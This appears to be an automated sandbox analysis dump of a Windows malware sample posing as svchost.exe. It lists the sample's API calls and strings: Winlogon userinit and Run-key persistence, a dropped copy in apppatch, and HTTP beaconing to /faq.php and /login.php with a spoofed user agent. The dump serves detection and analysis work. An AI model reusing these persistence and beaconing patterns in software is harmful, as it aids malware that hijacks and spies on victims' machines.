                                                                                                                                                                                                                    • String ID: 6b8e26743fcf62a2$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe), ref: 02C868DE
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?), ref: 02C86907
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02C86927
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000010), ref: 02C86944
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C8694B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8695F
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02C86979
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02C86981
                                                                                                                                                                                                                    • RegSetValueExA.KERNEL32(?,userinit,00000000,00000001,00000000,00000002), ref: 02C86A20
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C86A2F
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C86A32
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C86A3F
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C86A42
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(?), ref: 02C86A4C
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F013F,?), ref: 02C86A6D
                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02C86A9D
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(?), ref: 02C86AA7
                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(?), ref: 02C86AB1
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C86AB7
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,?), ref: 02C86AED
                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C86AFC
                                                                                                                                                                                                                    • RegNotifyChangeKeyValue.KERNEL32(?,00000000,0000000F,00000000,00000001), ref: 02C86B19
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C86B24
                                                                                                                                                                                                                    • RegNotifyChangeKeyValue.ADVAPI32(?,00000000,0000000F,00000000,00000001), ref: 02C86B47
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HeapValue$OpenProcess$ChangeFlushNotifyQuery$AdminAllocCloseCreateEventExistsFileFreeObjectPathSingleUserValidateWaitmemset
                                                                                                                                                                                                                    • String ID: ,$C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                    • API String ID: 2213373080-1283825033
                                                                                                                                                                                                                    • Opcode ID: bf019f43bef0af59052552b5b09ef3271221621f387e42b16880c8e3a12a44c3
                                                                                                                                                                                                                    • Instruction ID: 8822c7c67e2016f5214d1eb9464f0d1547cdcdbd9c47378666bae36805e27dd0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf019f43bef0af59052552b5b09ef3271221621f387e42b16880c8e3a12a44c3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C071D971E84245BBEB119B649C49FBBB76CDF84708F208694F941BB280DBB1DA05C7A0

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C75CA0
                                                                                                                                                                                                                      • Part of subcall function 02C839C0: memset.MSVCRT ref: 02C839F2
                                                                                                                                                                                                                      • Part of subcall function 02C839C0: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02C83A7E
                                                                                                                                                                                                                      • Part of subcall function 02C839C0: InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C83A9F
                                                                                                                                                                                                                      • Part of subcall function 02C839C0: HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83AD5
                                                                                                                                                                                                                    • calloc.MSVCRT ref: 02C75CE7
                                                                                                                                                                                                                    • exit.MSVCRT ref: 02C75CF6
                                                                                                                                                                                                                    • calloc.MSVCRT ref: 02C75CFF
                                                                                                                                                                                                                    • exit.MSVCRT ref: 02C75D09
                                                                                                                                                                                                                    • calloc.MSVCRT ref: 02C75D27
                                                                                                                                                                                                                    • exit.MSVCRT ref: 02C75D33
                                                                                                                                                                                                                    • calloc.MSVCRT ref: 02C75D3C
                                                                                                                                                                                                                    • exit.MSVCRT ref: 02C75D46
                                                                                                                                                                                                                    • calloc.MSVCRT ref: 02C75D64
                                                                                                                                                                                                                    • exit.MSVCRT ref: 02C75D71
                                                                                                                                                                                                                    • calloc.MSVCRT ref: 02C75D7B
                                                                                                                                                                                                                    • exit.MSVCRT ref: 02C75D86
                                                                                                                                                                                                                    • calloc.MSVCRT ref: 02C75DA9
                                                                                                                                                                                                                    • exit.MSVCRT ref: 02C75DB6
                                                                                                                                                                                                                    • calloc.MSVCRT ref: 02C75DC0
                                                                                                                                                                                                                    • exit.MSVCRT ref: 02C75DCF
                                                                                                                                                                                                                    • _strrev.MSVCRT ref: 02C75E39
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C76406,?), ref: 02C75EFC
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C75EFF
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C75F0C
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C75F0F
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(02C76406,02C76406,/login.php,02C76406,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02C75F1A
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(02C76406,00000000,?,00000000,00000000), ref: 02C75F2B
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(02C76406,?,00000000,00000000), ref: 02C75F32
                                                                                                                                                                                                                      • Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                                      • Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                                      • Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                                      • Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                                      • Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                                      • Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                                      • Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
                                                                                                                                                                                                                      • Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • /login.php, xrefs: 02C75CB1
                                                                                                                                                                                                                    • 6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9, xrefs: 02C75DDD
                                                                                                                                                                                                                    • 10001, xrefs: 02C75DFA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$callocexit$File$Process$memset$FreeHandleInternetOpenValidate$AllocateAttributesCloseConnectCreateDeleteExistsHttpInformationPathReadRequestSizeWrite_strrev
                                                                                                                                                                                                                    • String ID: /login.php$10001$6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9
                                                                                                                                                                                                                    • API String ID: 550513112-2761129557
                                                                                                                                                                                                                    • Opcode ID: 2a7eddcdeb8045a698a5e8522566253d47138d8247603723de7eecf209b64428
                                                                                                                                                                                                                    • Instruction ID: 0232dead3d0be3a74cf210bb2837edbe1b3ac61b181474ee5f9503a028576102
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a7eddcdeb8045a698a5e8522566253d47138d8247603723de7eecf209b64428
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76813870E402A5AFEB229F648C84BAFBFB8EF41344F044559ED45A7281D7B5DA04CBE1

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C855B1
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-000000F0,?,00000000), ref: 02C855E7
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C855EE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C85603
                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(00000000,?,?,00000000), ref: 02C85612
                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 02C85626
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8564C
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02C8568A
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C856C6
                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 02C856DB
                                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02C856F3
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C85702
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C8570F
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85771
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C85778
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85785
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8578C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,02CB7A90,00000001,00000000), ref: 02C857DE
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C857E1
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C857EE
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C857F1
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,02CB7A90,00000001,00000000), ref: 02C85800
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C8580D
                                                                                                                                                                                                                    • Sleep.KERNEL32(?,00000000,/faq.php,?,00000001,?,02CB7A8C,00000001,00000000), ref: 02C85851
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,00000000,/faq.php,?,00000001,?,02CB7A8C,00000001,00000000), ref: 02C85873
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • id=%s&ver=4.0.1&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d, xrefs: 02C856BF
                                                                                                                                                                                                                    • %2b, xrefs: 02C8563C
                                                                                                                                                                                                                    • /faq.php, xrefs: 02C857AC
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$FileProcess$memset$Sleep$AdminAttributesCheckConnectionDeleteFreeInternetTempUserValidatelstrcpyn$AliveAllocCacheCountFlushInformationNameNetworkPathResolverTickTimeZone_snprintf
                                                                                                                                                                                                                    • String ID: %2b$/faq.php$id=%s&ver=4.0.1&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02C83A7E
                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C83A9F
                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83AD5
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83B0B
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83B1A
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C83B38
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C83B50
                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,02C76406,?), ref: 02C83B5F
                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,?), ref: 02C83B7F
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83BB3
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83BD7
                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02C83BDA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83BF2
                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 02C83C0F
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C83C30
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C39
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C83C3C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C49
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C83C4C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C5A
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C83C5D
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C6A
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C83C6D
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C83C83
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C83C94
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02C83D10
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C83D13
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83D20
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C83D23
                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02C83D2D
                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02C83D3A
                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02C83D44
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • POST, xrefs: 02C83ABD, 02C83AD3
                                                                                                                                                                                                                    • GET, xrefs: 02C83AB6
                                                                                                                                                                                                                    • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C83A79
                                                                                                                                                                                                                    • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C83B27
                                                                                                                                                                                                                    • Content-Type: application/x-www-form-urlencoded, xrefs: 02C83B05
                                                                                                                                                                                                                    • Referer: http://www.google.com, xrefs: 02C83B14
                                                                                                                                                                                                                    • HTTP/1.0, xrefs: 02C83ACD
                                                                                                                                                                                                                    • 6b8e26743fcf62a2, xrefs: 02C83B22
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$HttpInternet$HandleRequest$Close$FileFreeHeadersValidate$Open$AllocateConnectCreateInfoInformationQueryReadSendWrite_snprintfmemset
                                                                                                                                                                                                                    • String ID: 6b8e26743fcf62a2$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),02C76406,00000000,00000000,04000000), ref: 02C836E1
                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C836FF
                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83731
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83762
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83771
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C8378E
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C837A6
                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000004,00000000), ref: 02C837B3
                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000013,02C76406,00000004,02C76406), ref: 02C837D3
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(02C76406,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83809
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83827
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C8382A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83842
                                                                                                                                                                                                                    • InternetReadFile.WININET(?,00000000,00001000,00000001), ref: 02C8385F
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02C83880
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83889
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C8388C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83899
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8389C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838AA
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C838AD
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838BA
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C838BD
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000001), ref: 02C838D3
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C838E4
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 02C8395F
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C83962
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8396F
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C83972
                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02C8397C
                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02C83986
                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02C83990
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • POST, xrefs: 02C8371C, 02C8372F
                                                                                                                                                                                                                    • GET, xrefs: 02C83712
                                                                                                                                                                                                                    • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C836DC
                                                                                                                                                                                                                    • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C8377D
                                                                                                                                                                                                                    • Content-Type: application/x-www-form-urlencoded, xrefs: 02C8375C
                                                                                                                                                                                                                    • Referer: http://www.google.com, xrefs: 02C8376B
                                                                                                                                                                                                                    • HTTP/1.0, xrefs: 02C83729
                                                                                                                                                                                                                    • 6b8e26743fcf62a2, xrefs: 02C83778
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$HttpInternet$HandleRequest$Close$FileFreeHeadersValidate$Open$AllocConnectCreateInfoInformationQueryReadSendWrite_snprintfmemset
                                                                                                                                                                                                                    • String ID: 6b8e26743fcf62a2$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com
                                                                                                                                                                                                                    • API String ID: 4235660723-4291293516
                                                                                                                                                                                                                    • Opcode ID: f792555316b6eb55b19c4c9f6b3892df755008ce3cf4a75a5b66fb121d0ac0ad
                                                                                                                                                                                                                    • Instruction ID: 14c700ebed10ca15fb36dad9405ebaab1b16be7677af05c9bd8b66d4237764b5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f792555316b6eb55b19c4c9f6b3892df755008ce3cf4a75a5b66fb121d0ac0ad
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5351A7719402847BEB219F54DC89FFB776CEF88B58F008658F905A71C0D7709A55CBA1

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C73126
                                                                                                                                                                                                                      • Part of subcall function 02C934A0: memset.MSVCRT ref: 02C934D3
                                                                                                                                                                                                                      • Part of subcall function 02C934A0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02C934E2
